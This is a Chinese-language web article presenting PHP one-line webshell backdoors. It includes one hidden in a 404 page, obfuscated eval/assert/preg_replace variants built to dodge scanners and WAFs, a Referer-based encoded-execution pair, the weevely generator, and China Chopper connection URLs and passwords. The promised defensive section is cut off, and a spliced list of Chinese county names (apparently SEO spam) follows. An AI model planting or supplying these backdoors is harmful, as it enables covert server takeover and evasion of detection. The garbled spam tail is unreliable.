我們以一個學(xué)習(xí)的心態(tài)來對待這些PHP后門程序,很多PHP后門代碼讓我們看到程序員們是多么的用心良苦。
強悍的PHP一句話后門
這類后門讓網(wǎng)站、服務(wù)器管理員很是頭疼,經(jīng)常要換著方法進行各種檢測,而很多新出現(xiàn)的編寫技術(shù),用普通的檢測方法是沒法發(fā)現(xiàn)并處理的。今天我們細數(shù)一些有意思的PHP一句話木馬。
利用404頁面隱藏PHP小馬:
Not Found
The requested URL was not found on this server.
<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>
404頁面是網(wǎng)站常用的文件,一般建議好后很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏后門。
無特征隱藏PHP一句話:
<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('/'a/'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[/'theCode/']))','a');
將$_POST['code']的內(nèi)容賦值給$_SESSION['theCode'],然后執(zhí)行$_SESSION['theCode'],亮點是沒有特征碼。用掃描工具來檢查代碼的話,是不會報警的,達到目的了。
超級隱蔽的PHP后門:
<?php $_GET[a]($_GET[b]);?>
僅用GET函數(shù)就構(gòu)成了木馬;
利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
執(zhí)行后當(dāng)前目錄生成c.php一句話木馬,當(dāng)傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應(yīng)用。
層級請求,編碼運行PHP后門:
此方法用兩個文件實現(xiàn),文件1
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
文件2
<?php//2.phpheader('Content-type:text/html;charset=utf-8');//要執(zhí)行的代碼$code = << $url, CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);
通過HTTP請求中的HTTP_REFERER來運行經(jīng)過base64編碼的代碼,來達到后門的效果,一般waf對referer這些檢測要松一點,或者沒有檢測。用這個思路bypass waf不錯。
PHP后門生成工具weevely
weevely是一款針對PHP的webshell的自由軟件,可用于模擬一個類似于telnet的連接shell,weevely通常用于web程序的漏洞利用,隱藏后門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的服務(wù)器端php代碼是經(jīng)過了base64編碼的,所以可以騙過主流的殺毒軟件和IDS,上傳服務(wù)器端代碼后通??梢酝ㄟ^weevely直接運行。
weevely所生成的PHP后門所使用的方法是現(xiàn)在比較主流的base64加密結(jié)合字符串變形技術(shù),后門中所使用的函數(shù)均是常用的字符串處理函數(shù),被作為檢查規(guī)則的eval,system等函數(shù)都不會直接出現(xiàn)在代碼中,從而可以致使后門文件繞過后門查找工具的檢查。使用暗組的Web后門查殺工具進行掃描,結(jié)果顯示該文件無任何威脅。
以上是大概介紹下邊是截圖,相關(guān)使用方法亦家就不在這介紹了,簡單的科普一下。

三個變形的一句話PHP木馬
第一個
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里寫http://site/1.php?2=assert密碼是1
第二個
<?php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里寫http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass。如果你用菜刀的附加數(shù)據(jù)的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。
第三個
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即編碼后的eval,完全避開了關(guān)鍵字,又不失效果,讓人吐血!
最后列幾個高級的PHP一句話木馬后門:
1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
2、
$filename=$_GET['xbid'];
include ($filename);
//危險的include函數(shù),直接編譯任何文件為php格式運行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句話
5、include ($uid);
//危險的include函數(shù),直接編譯任何文件為php格式運行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句話
6、典型一句話
程序后門代碼
<?php eval_r($_POST[sb])?>
程序代碼
<?php @eval_r($_POST[sb])?>
//容錯代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執(zhí)行相關(guān)的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入
程序代碼
h=@eval_r($_POST1);
程序代碼
//繞過<?限制的一句話
綜上,這些PHP一句話后門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結(jié)!
如何應(yīng)對PHP一句話后門:
我們強調(diào)幾個關(guān)鍵點,看這文章的你相信不是門外漢,我也就不
主站蜘蛛池模板:
东方市|
得荣县|
安丘市|
白水县|
成都市|
易门县|
页游|
长白|
扎兰屯市|
德化县|
许昌县|
通化市|
兴安盟|
富顺县|
莎车县|
广州市|
舒城县|
台山市|
临邑县|
任丘市|
莒南县|
五莲县|
琼海市|
遵义县|
洛南县|
通海县|
桐柏县|
资中县|
茶陵县|
济阳县|
安仁县|
上杭县|
盖州市|
新安县|
苍山县|
肥城市|
岑溪市|
绥江县|
泰和县|
漳平市|
彰武县|